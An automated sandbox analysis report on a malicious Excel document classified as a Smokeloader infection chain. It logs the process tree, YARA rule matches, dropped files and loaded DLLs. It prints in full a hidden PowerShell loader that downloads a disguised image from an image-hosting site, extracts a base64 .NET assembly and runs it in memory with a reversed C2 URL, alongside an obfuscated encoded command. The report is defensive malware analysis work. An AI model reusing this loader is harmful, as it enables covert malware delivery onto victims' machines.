Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00455498	12_2_00455498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_004551E8	12_2_004551E8
Source: C:\Windows\explorer.exe	Code function: 14_2_03F12840	14_2_03F12840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00082198	18_2_00082198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0008C2F9	18_2_0008C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0009B35C	18_2_0009B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000D4438	18_2_000D4438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_0009B97E	18_2_0009B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_00086E6A	18_2_00086E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000A5F08	18_2_000A5F08
Source: C:\Windows\explorer.exe	Code function: 19_2_00061E20	19_2_00061E20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0008170B	21_2_0008170B
Source: C:\Windows\explorer.exe	Code function: 23_2_000E2C00	23_2_000E2C00
Source: C:\Windows\explorer.exe	Code function: 25_2_000E2054	25_2_000E2054
Source: C:\Windows\explorer.exe	Code function: 25_2_000E2860	25_2_000E2860
Source: C:\Windows\explorer.exe	Code function: 29_2_00062A04	29_2_00062A04
Source: C:\Windows\explorer.exe	Code function: 29_2_000620F4	29_2_000620F4

Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\rugtucw D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00087F70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00088801 appears 40 times

Source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/5

Source: C:\Windows\explorer.exe

Code function: 14_2_03F13BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,

14_2_03F13BF4

Source: C:\Windows\explorer.exe

Code function: 14_2_03F135E8 CoCreateInstance,

14_2_03F135E8

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\26330000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rugtucw

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6576.tmp

Jump to behavior

Source: #20240627_Edlen_A.xls	OLE indicator, Workbook stream: true
Source: 26330000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucw
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucw	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
